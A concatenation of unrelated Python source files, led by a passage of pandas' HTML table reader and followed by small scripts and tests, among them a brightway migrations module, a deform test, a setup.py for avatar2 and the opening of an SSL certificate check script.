import lxml # noqa
_HAS_LXML = True
except ImportError:
pass
try:
import html5lib # noqa
_HAS_HTML5LIB = True
except ImportError:
pass
_IMPORTS = True
#############
# READ HTML #
#############
_RE_WHITESPACE = re.compile(r'[\r\n]+|\s{2,}')
char_types = string_types + (binary_type,)
def _remove_whitespace(s, regex=_RE_WHITESPACE):
"""Replace extra whitespace inside of a string with a single space.
Parameters
----------
s : str or unicode
The string from which to remove extra whitespace.
regex : regex
The regular expression to use to remove extra whitespace.
Returns
-------
subd : str or unicode
`s` with all extra whitespace replaced with a single space.
"""
return regex.sub(' ', s.strip())
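# A minimal doctest-style sketch of _remove_whitespace (inputs are made up):
#     >>> _remove_whitespace('  foo\n\nbar   baz ')
#     'foo bar baz'
# Leading/trailing whitespace is stripped first; runs of newlines and runs of
# two or more whitespace characters each collapse to a single space.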
def _get_skiprows(skiprows):
"""Get an iterator given an integer, slice or container.
Parameters
----------
skiprows : int, slice, container
The iterator to use to skip rows; can also be a slice.
Raises
------
TypeError
* If `skiprows` is not a slice, integer, or Container
Returns
-------
it : iterable
A proper iterator to use to skip rows of a DataFrame.
"""
if isinstance(skiprows, slice):
return lrange(skiprows.start or 0, skiprows.stop, skiprows.step or 1)
elif isinstance(skiprows, numbers.Integral) or is_list_like(skiprows):
return skiprows
elif skiprows is None:
return 0
raise TypeError('%r is not a valid type for skipping rows' %
type(skiprows).__name__)
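# Behavior sketch for _get_skiprows (hypothetical inputs):
#     >>> _get_skiprows(slice(2, 10, 2))
#     [2, 4, 6, 8]
#     >>> _get_skiprows(None)
#     0
# Integers and list-likes are passed through unchanged; anything else raises
# TypeError.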
def _read(obj):
"""Try to read from a url, file or string.
Parameters
----------
obj : str, unicode, or file-like
Returns
-------
raw_text : str
"""
if _is_url(obj):
with urlopen(obj) as url:
text = url.read()
elif hasattr(obj, 'read'):
text = obj.read()
elif isinstance(obj, char_types):
text = obj
try:
if os.path.isfile(text):
with open(text, 'rb') as f:
return f.read()
except (TypeError, ValueError):
pass
else:
raise TypeError("Cannot read object of type %r" % type(obj).__name__)
return text
class _HtmlFrameParser(object):
"""Base class for parsers that parse HTML into DataFrames.
Parameters
----------
io : str or file-like
This can be either a string of raw HTML, a valid URL using the HTTP,
FTP, or FILE protocols or a file-like object.
match : str or regex
The text to match in the document.
attrs : dict
List of HTML <table> element attributes to match.
encoding : str
Encoding to be used by parser
displayed_only : bool
Whether or not items with "display:none" should be ignored
.. versionadded:: 0.23.0
Attributes
----------
io : str or file-like
raw HTML, URL, or file-like object
match : regex
The text to match in the raw HTML
attrs : dict-like
A dictionary of valid table attributes to use to search for table
elements.
encoding : str
Encoding to be used by parser
displayed_only : bool
Whether or not items with "display:none" should be ignored
.. versionadded:: 0.23.0
Notes
-----
To subclass this class effectively you must override the following methods:
* :func:`_build_doc`
* :func:`_attr_getter`
* :func:`_text_getter`
* :func:`_parse_td`
* :func:`_parse_thead_tr`
* :func:`_parse_tbody_tr`
* :func:`_parse_tfoot_tr`
* :func:`_parse_tables`
* :func:`_equals_tag`
See each method's respective documentation for details on their
functionality.
"""
def __init__(self, io, match, attrs, encoding, displayed_only):
self.io = io
self.match = match
self.attrs = attrs
self.encoding = encoding
self.displayed_only = displayed_only
def parse_tables(self):
"""
Parse and return all tables from the DOM.
Returns
-------
list of parsed (header, body, footer) tuples from tables.
"""
tables = self._parse_tables(self._build_doc(), self.match, self.attrs)
return (self._parse_thead_tbody_tfoot(table) for table in tables)
def _attr_getter(self, obj, attr):
"""
Return the attribute value of an individual DOM node.
Parameters
----------
obj : node-like
A DOM node.
attr : str or unicode
The attribute, such as "colspan"
Returns
-------
str or unicode
The attribute value.
"""
# Both lxml and BeautifulSoup have the same implementation:
return obj.get(attr)
def _text_getter(self, obj):
"""
Return the text of an individual DOM node.
Parameters
----------
obj : node-like
A DOM node.
Returns
-------
text : str or unicode
The text from an individual DOM node.
"""
raise AbstractMethodError(self)
def _parse_td(self, obj):
"""Return the td elements from a row element.
Parameters
----------
obj : node-like
A DOM <tr> node.
Returns
-------
list of node-like
These are the elements of each row, i.e., the columns.
"""
raise AbstractMethodError(self)
def _parse_thead_tr(self, table):
"""
Return the list of thead row elements from the parsed table element.
Parameters
----------
table : a table element that contains zero or more thead elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tbody_tr(self, table):
"""
Return the list of tbody row elements from the parsed table element.
HTML5 table bodies consist of either 0 or more <tbody> elements (which
only contain <tr> elements) or 0 or more <tr> elements. This method
checks for both structures.
Parameters
----------
table : a table element that contains row elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tfoot_tr(self, table):
"""
Return the list of tfoot row elements from the parsed table element.
Parameters
----------
table : a table element that contains row elements.
Returns
-------
list of node-like
These are the <tr> row elements of a table.
"""
raise AbstractMethodError(self)
def _parse_tables(self, doc, match, attrs):
"""
Return all tables from the parsed DOM.
Parameters
----------
doc : the DOM from which to parse the table element.
match : str or regular expression
The text to search for in the DOM tree.
attrs : dict
A dictionary of table attributes that can be used to disambiguate
multiple tables on a page.
Raises
------
ValueError : `match` does not match any text in the document.
Returns
-------
list of node-like
HTML <table> elements to be parsed into raw data.
"""
raise AbstractMethodError(self)
def _equals_tag(self, obj, tag):
"""
Return whether an individual DOM node matches a tag
Parameters
----------
obj : node-like
A DOM node.
tag : str
Tag name to be checked for equality.
Returns
-------
boolean
Whether `obj`'s tag name is `tag`
"""
raise AbstractMethodError(self)
def _build_doc(self):
"""
Return a tree-like object that can be used to iterate over the DOM.
Returns
-------
node-like
The DOM from which to parse the table element.
"""
raise AbstractMethodError(self)
def _parse_thead_tbody_tfoot(self, table_html):
"""
Given a table, return parsed header, body, and foot.
Parameters
----------
table_html : node-like
Returns
-------
tuple of (header, body, footer), each a list of list-of-text rows.
Notes
-----
Header and body are lists-of-lists. Top level list is a list of
rows. Each row is a list of str text.
Logic: Use <thead>, <tbody>, <tfoot> elements to identify
header, body, and footer, otherwise:
- Put all rows into body
- Move rows from top of body to header only if
all elements inside row are <th>
- Move rows from bottom of body to footer only if
all elements inside row are <th>
"""
header_rows = self._parse_thead_tr(table_html)
body_rows = self._parse_tbody_tr(table_html)
footer_rows = self._parse_tfoot_tr(table_html)
def row_is_all_th(row):
return all(self._equals_tag(t, 'th') for t in
self._parse_td(row))
if not header_rows:
# The table has no <thead>. Move the top all-<th> rows from
# body_rows to header_rows. (This is a common case because many
# tables in the wild have no <thead> or <tfoot>.)
while body_rows and row_is_all_th(body_rows[0]):
header_rows.append(body_rows.pop(0))
header = self._expand_colspan_rowspan(header_rows)
body = self._expand_colspan_rowspan(body_rows)
footer = self._expand_colspan_rowspan(footer_rows)
return header, body, footer
def _expand_colspan_rowspan(self, rows):
"""
Given a list of <tr>s, return a list of text rows.
Parameters
----------
rows : list of node-like
List of <tr>s
Returns
-------
list of list
Each returned row is a list of str text.
Notes
-----
Any cell with ``rowspan`` or ``colspan`` will have its contents copied
to subsequent cells.
"""
all_texts = [] # list of rows, each a list of str
remainder = [] # list of (index, text, nrows)
for tr in rows:
texts = [] # the output for this row
next_remainder = []
index = 0
tds = self._parse_td(tr)
for td in tds:
# Append texts from previous rows with rowspan>1 that come
# before this <td>
while remainder and remainder[0][0] <= index:
prev_i, prev_text, prev_rowspan = remainder.pop(0)
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
index += 1
# Append the text from this <td>, colspan times
text = _remove_whitespace(self._text_getter(td))
rowspan = int(self._attr_getter(td, 'rowspan') or 1)
colspan = int(self._attr_getter(td, 'colspan') or 1)
for _ in range(colspan):
texts.append(text)
if rowspan > 1:
next_remainder.append((index, text, rowspan - 1))
index += 1
# Append texts from previous rows at the final position
for prev_i, prev_text, prev_rowspan in remainder:
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
all_texts.append(texts)
remainder = next_remainder
# Append rows that only appear because the previous row had non-1
# rowspan
while remainder:
next_remainder = []
texts = []
for prev_i, prev_text, prev_rowspan in remainder:
texts.append(prev_text)
if prev_rowspan > 1:
next_remainder.append((prev_i, prev_text,
prev_rowspan - 1))
all_texts.append(texts)
remainder = next_remainder
return all_texts
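# Worked example of the colspan/rowspan expansion above (hypothetical table):
# a row of <td colspan=2>A</td><td rowspan=2>B</td> followed by a row of
# <td>C</td><td>D</td> expands to
#     [['A', 'A', 'B'],
#      ['C', 'D', 'B']]
# i.e. "A" is copied colspan times and "B" is carried down into the next row.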
def _handle_hidden_tables(self, tbl_list, attr_name):
"""
Return list of tables, potentially removing hidden elements
Parameters
----------
tbl_list : list of node-like
Type of list elements will vary depending upon parser used
attr_name : str
Name of the accessor for retrieving HTML attributes
Returns
-------
list of node-like
Return type matches `tbl_list`
"""
if not self.displayed_only:
return tbl_list
return [x for x in tbl_list if "display:none" not in
getattr(x, attr_name).get('style', '').replace(" ", "")]
class _BeautifulSoupHtml5LibFrameParser(_HtmlFrameParser):
"""HTML to DataFrame parser that uses BeautifulSoup under the hood.
See Also
--------
pandas.io.html._HtmlFrameParser
pandas.io.html._LxmlFrameParser
Notes
-----
Documentation strings for this class are in the base class
:class:`pandas.io.html._HtmlFrameParser`.
"""
def __init__(self, *args, **kwargs):
super(_BeautifulSoupHtml5LibFrameParser, self).__init__(*args,
**kwargs)
from bs4 import SoupStrainer
self._strainer = SoupStrainer('table')
def _parse_tables(self, doc, match, attrs):
element_name = self._strainer.name
tables = doc.find_all(element_name, attrs=attrs)
if not tables:
raise ValueError('No tables found')
result = []
unique_tables = set()
tables = self._handle_hidden_tables(tables, "attrs")
for table in tables:
if self.displayed_only:
for elem in table.find_all(
style=re.compile(r"display:\s*none")):
elem.decompose()
if (table not in unique_tables and
table.find(text=match) is not None):
result.append(table)
unique_tables.add(table)
if not result:
raise ValueError("No tables found matching pattern {patt!r}"
.format(patt=match.pattern))
return result
def _text_getter(self, obj):
return obj.text
def _equals_tag(self, obj, tag):
return obj.name == tag
def _parse_td(self, row):
return row.find_all(('td', 'th'), recursive=False)
def _parse_thead_tr(self, table):
return table.select('thead tr')
def _parse_tbody_tr(self, table):
from_tbody = table.select('tbody tr')
from_root = table.find_all('tr', recursive=False)
# HTML spec: at most one of these lists has content
return from_tbody + from_root
def _parse_tfoot_tr(self, table):
return table.select('tfoot tr')
def _setup_build_doc(self):
raw_text = _read(self.io)
if not raw_text:
raise ValueError('No text parsed from document: {doc}'
.format(doc=self.io))
return raw_text
def _build_doc(self):
from bs4 import BeautifulSoup
return BeautifulSoup(self._setup_build_doc(), features='html5lib',
from_encoding=self.encoding)
def _build_xpath_expr(attrs):
"""Build an xpath expression to simulate bs4's ability to pass in kwargs to
search for attributes when using the lxml parser.
Parameters
----------
attrs : dict
A dict of HTML attributes. These are NOT checked for validity.
Returns
-------
expr : unicode
An XPath expression that checks for the given HTML attributes.
"""
# give class attribute as class_ because class is a python keyword
if 'class_' in attrs:
attrs['class'] = attrs.pop('class_')
s = ["@{key}={val!r}".format(key=k, val=v) for k, v in iteritems(attrs)]
return '[{expr}]'.format(expr=' and '.join(s))
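# Doctest-style sketch of _build_xpath_expr (attribute values are made up):
#     >>> _build_xpath_expr({'id': 'table'})
#     "[@id='table']"
#     >>> _build_xpath_expr({'class_': 'wide'})
#     "[@class='wide']"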
_re_namespace = {'re': 'http://exslt.org/regular-expressions'}
_valid_schemes = 'http', 'file', 'ftp'
class _LxmlFrameParser(_HtmlFrameParser):
"""HTML to DataFrame parser that uses lxml under the hood.
Warning
-------
This parser can only handle HTTP, FTP, and FILE urls.
See Also
--------
_HtmlFrameParser
_BeautifulSoupHtml5LibFrameParser
Notes
-----
Documentation strings for this class are in the base class
:class:`_HtmlFrameParser`.
"""
def __init__(self, *args, **kwargs):
super(_LxmlFrameParser, self).__init__(*args, **kwargs)
def _text_getter(self, obj):
return obj.text_content()
def _parse_td(self, row):
# Look for direct children only: the "row" element here may be a
# <thead> or <tfoot> (see _parse_thead_tr).
return row.xpath('./td|./th')
def _parse_tables(self, doc, match, kwargs):
pattern = match.pattern
# 1. check all descendants for the given pattern and only search tables
# 2. go up the tree until we find a table
query = '//table//*[re:test(text(), {patt!r})]/ancestor::table'
xpath_expr = query.format(patt=pattern)
# if any table attributes were given build an xpath expression to
# search for them
if kwargs:
xpath_expr += _build_xpath_expr(kwargs)
tables = doc.xpath(xpath_expr, namespaces=_re_namespace)
tables = self._handle_hidden_tables(tables, "attrib")
if self.displayed_only:
for table in tables:
# lxml utilizes XPATH 1.0 which does not have regex
# support. As a result, we find all elements with a style
# attribute and iterate them to check for display:none
for elem in table.xpath('.//*[@style]'):
if "display:none" in elem.attrib.get(
"style", "").replace(" ", ""):
elem.getparent().remove(elem)
if not tables:
raise ValueError("No tables found matching regex {patt!r}"
.format(patt=pattern))
return tables
def _equals_tag(self, obj, tag):
return obj.tag == tag
def _build_doc(self):
"""
Raises
------
ValueError
* If a URL that lxml cannot parse is passed.
Exception
* Any other ``Exception`` thrown. For example, trying to parse a
URL that is syntactically correct on a machine with no internet
connection will fail.
See Also
--------
pandas.io.html._HtmlFrameParser._build_doc
"""
from lxml.html import parse, fromstring, HTMLParser
from lxml.etree import XMLSyntaxError
parser = HTMLParser(recover=True, encoding=self.encoding)
try:
if _is_url(self.io):
with urlopen(self.io) as f:
r = parse(f, parser=parser)
else:
# try to parse the input in the simplest way
r = parse(self.io, parser=parser)
try:
r = r.getroot()
except AttributeError:
pass
except (UnicodeDecodeError, IOError) as e:
# if the input is a blob of html goop
if not _is_url(self.io):
r = fromstring(self.io, parser=parser)
try:
r = r.getroot()
except AttributeError:
pass
else:
raise e
else:
if not hasattr(r, 'text_content'):
raise XMLSyntaxError("no text parsed from document", 0, 0, 0)
return r
def _parse_thead_tr(self, table):
rows = []
for thead in table.xpath('.//thead'):
rows.extend(thead.xpath('./tr'))
# HACK: lxml does not clean up the clearly-erroneous
# <thead><th>foo</th><th>bar</th></thead>. (Missing <tr>). Add
# the <thead> and _pretend_ it's a <tr>; _parse_td() will find its
# children as though it's a <tr>.
#
# Better solution would be to use html5lib.
elements_at_root = thead.xpath('./td|./th')
if elements_at_root:
rows.append(thead)
return rows
def _parse_tbody_tr(self, table):
from_tbody = table.xpath('.//tbody//tr')
from_root = table.xpath('./tr')
# HTML spec: at most one of these lists has content
return from_tbody + from_root
def _parse_tfoot_tr(self, table):
return table.xpath('.//tfoot//tr')
def _expand_elements(body):
lens = Series(lmap(len, body))
lens_max = lens.max()
not_max = lens[lens != lens_max]
empty = ['']
for ind, length in iteritems(not_max):
body[ind] += empty * (lens_max - length)
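# Padding sketch for _expand_elements (rows invented for illustration): ragged
# rows are padded in place with empty strings up to the longest row, e.g.
#     [['a', 'b', 'c'], ['d'], ['e', 'f']]
# becomes
#     [['a', 'b', 'c'], ['d', '', ''], ['e', 'f', '']]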
def _data_to_frame(**kwargs):
head, body, foot = kwargs.pop('data')
header = kwargs.pop('header')
kwargs['skiprows'] = _get_skiprows(kwargs['skiprows'])
if head:
body = head + body
# Infer header when there is a <thead> or top <th>-only rows
if header is None:
if len(head) == 1:
header = 0
else:
# ignore all-empty-text rows
header = [i for i, row in enumerate(head)
if any(text for text in row)]
if foot:
body += foot
# fill out elements of body that are "ragged"
_expand_elements(body)
tp = TextParser(body, header=header, **kwargs)
df = tp.read()
return df
_valid_parsers = {'lxml': _LxmlFrameParser, None: _LxmlFrameParser,
'html5lib': _BeautifulSoupHtml5LibFrameParser,
'bs4': _BeautifulSoupHtml5LibFrameParser}
def _parser_dispatch(flavor):
"""Choose the parser based on the input flavor.
Parameters
----------
flavor : str
The type of parser to use. This must be a valid backend.
Returns
-------
cls : _HtmlFrameParser subclass
The parser class based on the requested input flavor.
Raises
------
ValueError
* If `flavor` is not a valid backend.
ImportError
* If you do not have the requested `flavor`
"""
valid_parsers = list(_valid_parsers.keys())
if flavor not in valid_parsers:
raise ValueError('{invalid!r} is not a valid flavor, valid flavors '
'are {valid}'
.format(invalid=flavor, valid=valid_parsers))
if flavor in ('bs4', 'html5lib'):
if not _HAS_HTML5LIB:
raise ImportError("html5lib not found, please install it")
if not _HAS_BS4:
raise ImportError(
"BeautifulSoup4 (bs4) not found, please install it")
import bs4
if LooseVersion(bs4.__version__) <= LooseVersion('4.2.0'):
raise ValueError("A minimum version of BeautifulSoup 4.2.1 "
"is required")
else:
if not _HAS_LXML:
raise ImportError("lxml not found, please install it")
return _valid_parsers[flavor]
def _print_as_set(s):
return ('{' + '{arg}'.format(arg=', '.join(
pprint_thing(el) for el in s)) + '}')
def _validate_flavor(flavor):
if flavor is None:
flavor = 'lxml', 'bs4'
elif isinstance(flavor, string_types):
flavor = flavor,
elif isinstance(flavor, compat.Iterable):
if not all(isinstance(flav, string_types) for flav in flavor):
raise TypeError('Object of type {typ!r} is not an iterable of '
'strings'
.format(typ=type(flavor).__name__))
else:
fmt = '{flavor!r}' if isinstance(flavor, string_types) else '{flavor}'
fmt += ' is not a valid flavor'
raise ValueError(fmt.format(flavor=flavor))
flavor = tuple(flavor)
valid_flavors = set(_valid_parsers)
flavor_set = set(flavor)
if not flavor_set & valid_flavors:
raise ValueError('{invalid} is not a valid set of flavors, valid '
'flavors are {valid}'
.format(invalid=_print_as_set(flavor_set),
valid=_print_as_set(valid_flavors)))
return flavor
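# Behavior sketch for _validate_flavor (assumed inputs):
#     >>> _validate_flavor(None)
#     ('lxml', 'bs4')
#     >>> _validate_flavor('bs4')
#     ('bs4',)
# Unknown flavors raise ValueError, and iterables containing non-strings raise
# TypeError.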
def _parse(flavor, io, match, attrs, encoding, displayed_only, **kwargs):
flavor = _validate_flavor(flavor)
compiled_match = re.compile(match) # you can pass a compiled regex here
# hack around python 3 deleting the exception variable
retained = None
for flav in flavor:
parser = _parser_dispatch(flav)
p = parser(io, compiled_match, attrs, encoding, displayed_only)
try:
tables = p.parse_tables()
except Exception as caught:
# if `io` is an io-like object, check if it's seekable
# and try to rewind it before trying the next parser
if hasattr(io, 'seekable') and io.seekable():
io.seek(0)
elif hasattr(io, 'seekable') and not io.seekable():
# if we couldn't rewind it, let the user know
raise ValueError('The flavor {} failed to parse your input. '
'Since you passed a non-rewindable file '
'object, we can\'t rewind it to try '
'another parser. Try read_html() with a '
'different flavor.'.format(flav))
retained = caught
else:
break
else:
raise_with_traceback(retained)
ret = []
for table in tables:
try:
ret.append(_data_to_frame(data=table, **kwargs))
except EmptyDataError: # empty table
continue
return ret
def read_html(io, match='.+', flavor=None, header=None, index_col=None,
skiprows=None, attrs=None, parse_dates=False,
tupleize_cols=None, thousands=',', encoding=None,
decimal='.', converters=None, na_values=None,
keep_default_na=True, displayed_only=True):
r"""Read HTML tables into a ``list`` of ``DataFrame`` objects.
Parameters
----------
io : str or file-like
A URL, a file-like object, or a raw string containing HTML. Note that
lxml only accepts the http, ftp and file url protocols. If you have a
URL that starts with ``'https'`` you might try removing the ``'s'``.
match : str or compiled regular expression, optional
The set of tables containing text matching this regex or string will be
returned. Unless the HTML is extremely simple you will probably need to
pass a non-empty string here. Defaults to '.+' (match any non-empty
string). The default value will return all tables contained on a page.
This value is converted to a regular expression so that there is
consistent behavior between Beautiful Soup and lxml.
flavor : str or None, container of strings
The parsing engine to use. 'bs4' and 'html5lib' are synonymous with
each other, they are both there for backwards compatibility. The
default of ``None`` tries to use ``lxml`` to parse and if that fails it
falls back on ``bs4`` + ``html5lib``.
header : int or list-like or None, optional
The row (or list of rows for a :class:`~pandas.MultiIndex`) to use to
make the columns headers.
index_col : int or list-like or None, optional
The column (or list of columns) to use to create the index.
skiprows : int or list-like or slice or None, optional
0-based. Number of rows to skip after parsing the column integer. If a
sequence of integers or a slice is given, will skip the rows indexed by
that sequence. Note that a single element sequence means 'skip the nth
row' whereas an integer means 'skip n rows'.
attrs : dict or None, optional
This is a dictionary of attributes that you can pass to use to identify
the table in the HTML. These are not checked for validity before being
passed to lxml or Beautiful Soup. However, these attributes must be
valid HTML table attributes to work correctly. For example, ::
attrs = {'id': 'table'}
is a valid attribute dictionary because the 'id' HTML tag attribute is
a valid HTML attribute for *any* HTML tag as per `this document
<http://www.w3.org/TR/html-markup/global-attributes.html>`__. ::
attrs = {'asdf': 'table'}
is *not* a valid attribute dictionary because 'asdf' is not a valid
HTML attribute even if it is a valid XML attribute. Valid HTML 4.01
table attributes can be found `here
<http://www.w3.org/TR/REC-html40/struct/tables.html#h-11.2>`__. A
working draft of the HTML 5 spec can be found `here
<http://www.w3.org/TR/html-markup/table.html>`__. It contains the
latest information on table attributes for the modern web.
parse_dates : bool, optional
See :func:`~read_csv` for more details.
tupleize_cols : bool, optional
If ``False`` try to parse multiple header rows into a
:class:`~pandas.MultiIndex`, otherwise return raw tuples. Defaults to
``False``.
.. deprecated:: 0.21.0
This argument will be removed and will always convert to MultiIndex
thousands : str, optional
Separator to use to parse thousands. Defaults to ``','``.
encoding : str or None, optional
        The encoding used to decode the web page. Defaults to ``None``. ``None``
preserves the previous encoding behavior, which depends on the
underlying parser library (e.g., the parser library will try to use
the encoding provided by the document).
decimal : str, default '.'
Character to recognize as decimal point (e.g. use ',' for European
data).
.. versionadded:: 0.19.0
converters : dict, default None
Dict of functions for converting values in certain columns. Keys can
either be integers or column labels, values are functions that take one
input argument, the cell (not column) content, and return the
transformed content.
.. versionadded:: 0.19.0
na_values : iterable, default None
Custom NA values
.. versionadded:: 0.19.0
keep_default_na : bool, default True
If na_values are specified and keep_default_na is False the default NaN
values are overridden, otherwise they're appended to
.. versionadded:: 0.19.0
displayed_only : bool, default True
Whether elements with "display: none" should be parsed
.. versionadded:: 0.23.0
Returns
-------
dfs : list of DataFrames
See Also
--------
read_csv
Notes
-----
Before using this function you should read the :ref:`gotchas about the
HTML parsing libraries <io.html.gotchas>`.
Expect to do some cleanup after you call this function. For example, you
might need to manually assign column names if the column names are
converted to NaN when you pass the `header=0` argument. We try to assume as
little as possible about the structure of the table and push the
idiosyncrasies of the HTML contained in the table to the user.
This function searches for ``<table>`` elements and only for ``<tr>``
and ``<th>`` rows and ``<td>`` elements within each ``<tr>`` or ``<th>``
element in the table. ``<td>`` stands for "table data". This function
attempts to properly handle ``colspan`` and ``rowspan`` attributes.
If the function has a ``<thead>`` argument, it is used to construct
the header, otherwise the function attempts to find the header within
the body (by putting rows with only ``<th>`` elements into the header).
.. versionadded:: 0.21.0
Similar to :func:`~read_csv` the `header` argument is applied
**after** `skiprows` is applied.
This function will *always* return a list of :class:`DataFrame` *or*
it will fail, e.g., it will *not* return an empty list.
Examples
--------
See the :ref:`read_html documentation in the IO section of the docs
<io.read_html>` for some examples of reading in HTML tables.
"""
_importers()
# Type check here. We don't want to parse only to fail because of an
# invalid value of an integer skiprows.
if isinstance(skiprows, numbers.Integral) and skiprows < 0:
raise ValueError('cannot skip rows starting from the end of the '
'data (you passed a negative value)')
_validate_header_arg(header)
return _parse(flavor=flavor, io=io, match=match, header=header,
index_col=index_col, skiprows=skiprows,
parse_dates=parse_dates, tupleize_cols=tupleize_cols,
thousands=thousands, attrs=attrs, encoding=encoding,
decimal=decimal, converters=converters, na_values=na_values,
keep_default_na=keep_default_na,
displayed_only=displayed_only)
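# Usage sketch: a minimal call to the read_html API documented above. The HTML
# snippet and the 'demo' id are purely illustrative; read_html also accepts
# URLs and file-like objects.
def _read_html_example():
    html = """<table id="demo">
    <tr><th>name</th><th>value</th></tr>
    <tr><td>alpha</td><td>1</td></tr>
    <tr><td>beta</td><td>2</td></tr>
    </table>"""
    dfs = read_html(html, attrs={'id': 'demo'})  # always returns a list of DataFrames
    return dfs[0]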
|
py | 7df7cca327aeae26f839eb99b866c73ec316ea5c |
from .. import Patcher
def test_mc_cycle():
p = Patcher('outputs/test_mc_cycle.maxpat')
obj = p.add_textbox('mc.cycle~ 440')
p.save()
if __name__ == '__main__':
test_mc_cycle()
|
py | 7df7cd2cf260932f5bda338cad78d9d14c72505b | import os
from bw2data import projects
from bw2data.data_store import DataStore
from bw2data.serialization import JsonWrapper, SerializedDict
from .data import (
get_biosphere_2_3_category_migration_data,
get_biosphere_2_3_name_migration_data,
get_ecoinvent_pre35_migration_data,
get_exiobase_biosphere_migration_data,
get_simapro_ecoinvent_3_migration_data,
get_simapro_water_migration_data,
get_us_lci_migration_data,
)
from .units import get_default_units_migration_data, get_unusual_units_migration_data
class _Migrations(SerializedDict):
filename = "migrations.json"
migrations = _Migrations()
class Migration(DataStore):
_metadata = migrations
def __init__(self, *args, **kwargs):
super(Migration, self).__init__(*args, **kwargs)
self._intermediate_dir = projects.request_directory("migrations")
@property
def description(self):
return self.metadata["description"]
def validate(self, *args, **kwargs):
return
def write(self, data, description):
"""Write migration data. Requires a description."""
try:
self.register()
migrations[self.name]["description"] = description
except:
self.register(description=description)
filepath = os.path.join(self._intermediate_dir, self.filename + ".json")
JsonWrapper.dump(data, filepath)
def load(self):
self.register()
filepath = os.path.join(self._intermediate_dir, self.filename + ".json")
return JsonWrapper.load(filepath)
def create_core_migrations():
"""Add pre-defined core migrations data files"""
Migration("biosphere-2-3-categories").write(
get_biosphere_2_3_category_migration_data(),
"Change biosphere category and subcategory labels to ecoinvent version 3",
)
Migration("biosphere-2-3-names").write(
get_biosphere_2_3_name_migration_data(),
"Change biosphere flow names to ecoinvent version 3",
)
Migration("simapro-ecoinvent-3.1").write(
get_simapro_ecoinvent_3_migration_data("3.1"),
"Change SimaPro names from ecoinvent 3.1 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.2").write(
get_simapro_ecoinvent_3_migration_data("3.2"),
"Change SimaPro names from ecoinvent 3.2 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.3").write(
get_simapro_ecoinvent_3_migration_data("3.3"),
"Change SimaPro names from ecoinvent 3.3 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.4").write(
get_simapro_ecoinvent_3_migration_data("3.4"),
"Change SimaPro names from ecoinvent 3.4 to ecoinvent names",
)
Migration("simapro-ecoinvent-3.5").write(
get_simapro_ecoinvent_3_migration_data("3.5"),
"Change SimaPro names from ecoinvent 3.5 to ecoinvent names",
)
Migration("simapro-water").write(
get_simapro_water_migration_data(),
"Change SimaPro water flows to more standard names",
)
Migration("us-lci").write(
get_us_lci_migration_data(), "Fix names in US LCI database"
)
Migration("default-units").write(
get_default_units_migration_data(), "Convert to default units"
)
Migration("unusual-units").write(
get_unusual_units_migration_data(), "Convert non-Ecoinvent units"
)
Migration("exiobase-biosphere").write(
get_exiobase_biosphere_migration_data(),
"Change biosphere flow names to ecoinvent version 3",
)
Migration("fix-ecoinvent-flows-pre-35").write(
get_ecoinvent_pre35_migration_data(),
"Update new biosphere UUIDs in Consequential 3.4",
)
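def _example_custom_migration():
    """Usage sketch: writing and reading back a custom migration with the
    Migration class above. The name and mapping are hypothetical, not one of
    the predefined core migrations."""
    data = {
        "fields": ["name"],
        "data": [(("old flow name",), {"name": "new flow name"})],
    }
    Migration("example-rename").write(data, "Hypothetical rename of one flow")
    return Migration("example-rename").load()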
|
py | 7df7cd4deb1fe9f9905af92261d80b1b03dabf12 | from setuptools import setup
from sys import version_info
setup(
name='avatar2',
version='1.1.1',
packages=['avatar2',
'avatar2/archs',
'avatar2/targets',
'avatar2/protocols',
'avatar2/peripherals',
'avatar2/plugins',
'avatar2/plugins/arm',
'avatar2/installer'
],
install_requires=[
'numpy',
'pygdbmi==0.9.0.0',
'intervaltree',
'posix_ipc>=1.0.0',
'capstone>=3.0.4',
'keystone-engine',
'parse',
'configparser',
'npyscreen',
'enum34',
'unicorn'
],
dependency_links=[
'https://github.com/jonathanslenders/python-prompt-toolkit/tarball/2.0#egg=prompt-toolkit-2.0.0'
],
url='http://www.s3.eurecom.fr/tools/avatar/',
description='Dynamic firmware analysis'
)
|
py | 7df7cdba37126acf728d5377ac33dbe9301968b1 | '''
It counts the words in a text file
'''
import re
def calculate_words(path):
    f = open(path, 'r')
    lines = f.readlines()
    f.close()
    count = 0
    for line in lines:
        count += len(re.split('[,.! ?:]', line))  # use the re module to split each line into words
    return count - len(lines)  # each split also yields an empty string for the trailing '\n' or '', so subtract one per line
words = calculate_words("C:/Users/razzl/Desktop/1.txt")  # in Python, '/' works as the path separator on all systems
print(words)
|
py | 7df7cf7eba92ace900d84e8d2259b1483622fcab | import unittest
class TestValidationFailure(unittest.TestCase):
def _makeOne(self, field, cstruct, error):
from deform.exception import ValidationFailure
return ValidationFailure(field, cstruct, error)
def test_render(self):
widget = DummyWidget()
form = DummyForm(widget)
cstruct = {}
e = self._makeOne(form, cstruct, None)
result = e.render()
self.assertEqual(result, cstruct)
result = e.render(custom_property='Test')
self.assertEqual(result['custom_property'], 'Test')
class DummyForm(object):
def __init__(self, widget):
self.widget = widget
class DummyWidget(object):
def serialize(self, field, cstruct, **kw):
cstruct.update(kw)
return cstruct
|
py | 7df7cff43f808c8b2d025be8279751ae91deee8e | import pandas as pd
target = [
'train_data',
'test_data',
]
extension = 'csv'
# extension = 'tsv'
# extension = 'zip'
for t in target:
(pd.read_csv('./data/input/' + t + '.' + extension, encoding="utf-8"))\
.to_feather('./data/input/' + t + '.feather')
|
py | 7df7d00bb4bb43b2d52fe945510296691c220b32 | from django.apps import AppConfig
class AccountsAdminConfig(AppConfig):
name = 'accounts_admin'
|
py | 7df7d1101492b8792a1c3df6e0ef320b57982d96 | #!/usr/bin/python36
import OpenSSL
import ssl, socket
import time
import argparse
import datetime
from datetime import datetime
# declare variables
status = ["OK: ", "WARNING: ", "CRITICAL: ", "UNKNOWN: "]
parser = argparse.ArgumentParser()
parser.add_argument(
"-H", "--host", required=True, type=str, help="hostname where the SSL cert exists"
)
parser.add_argument(
"-P", "--port", default=443, type=int, help="port to connect over. default 443"
)
